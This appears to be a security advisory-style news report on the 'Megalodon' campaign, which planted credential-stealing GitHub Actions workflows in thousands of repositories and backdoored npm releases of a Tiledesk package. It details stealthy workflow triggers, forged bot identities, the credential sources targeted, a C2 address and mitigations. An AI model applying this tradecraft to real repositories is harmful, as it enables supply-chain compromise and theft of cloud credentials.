Megalodon-Malware kompromittiert innerhalb von sechs Stunden über 5.500 GitHub-Repositorien

The attacker forged author identities build-bot, auto-ci, ci-bot, pipeline-bot, with emails build-system@noreply.dev and ci-bot@automated.dev, mimicking routine automated CI maintenance. Commit messages such as “ci: add build optimization step” and “chore: optimize pipeline runtime” were deliberately designed to evade casual code review.

Megalodon Payload Variants The campaign deployed two distinct GitHub Actions workflow variants sharing the same C2 server at 216.126.225.129:8443: SysDiag (Mass Variant): Added a new.github/workflows/ci.yml file triggering on every push and pull_request_target, ensuring automated execution on any commit across all branches Optimize-Build (Targeted Variant): Replaced existing workflows with a workflow_dispatch trigger, creating a dormant backdoor that the attacker can silently activate on demand via the GitHub API — producing zero visible CI runs and no failed builds.

Both variants requested elevated permissions: id-token: write and actions: read, enabling OIDC token theft for cloud identity impersonation.

Technischer Hintergrund

The base64-encoded bash payload — a 111-line script — conducted aggressive, multi-phase credential harvesting once triggered: All CI environment variables, /proc/*/environ, and PID 1 environment data AWS credentials (access keys, secret keys, session tokens) across all configured profiles GCP access tokens via gcloud auth print-access-token Live credentials from AWS IMDSv2, GCP metadata, and Azure IMDS endpoints SSH private keys, Docker auth configs,.npmrc,.netrc, Kubernetes configs, Vault tokens, and Terraform credentials Source code grep-scanned against 30+ regex patterns targeting API keys, JWTs, database connection strings, PEM keys, and cloud tokens GitHub Actions OIDC tokens enabling direct cloud identity impersonation The attack’s most critical downstream impact targeted Tiledesk, an open-source live chat platform.

The attacker compromised the GitHub repository and replaced the legitimate Docker build workflow with the Optimize-Build backdoor via commit acac5a9. The maintainer, unaware that the repository was poisoned, subsequently published @tiledesk/tiledesk-server versions 2.18.6 through 2.18.12 to npm, propagating the backdoor to the package registry.

Application code remained untouched; only the workflow file changed. Indicators of Compromise (IoC) C2 Server: Value: hxxp://216[.]126[.]225[.]129:8443. Campaign ID: Value: megalodon. Author Emails: Value: build-system@noreply[.]dev, ci-bot@automated[.]dev. Author Names: Value: build-bot, auto-ci, ci-bot, pipeline-bot.

Sicherheitslage und Risiko

Mass Workflow: Value:.github/workflows/ci.yml (SysDiag). Targeted Workflow: Value: Optimize-Build ( workflow_dispatch ). Affected npm Versions: Value: @tiledesk/tiledesk-server 2.18.6–2.18.12. Malicious Commit: Value: acac5a9854650c4ae2883c4740bf87d34120c038.

Mitigations Organizations should act immediately if any repository receives a commit from build-system@noreply[.]dev or ci-bot@automated[.]dev on May 18, 2026: Revert the malicious commit and audit all.github/workflows/ files Rotate all secrets accessible to GitHub Actions runners — tokens, API keys, SSH keys, cloud credentials Audit cloud logs for anomalous OIDC token requests from unknown workflow runs Check the Actions tab for unexpected workflow_dispatch executions Pin GitHub Actions to specific commit SHAs rather than mutable version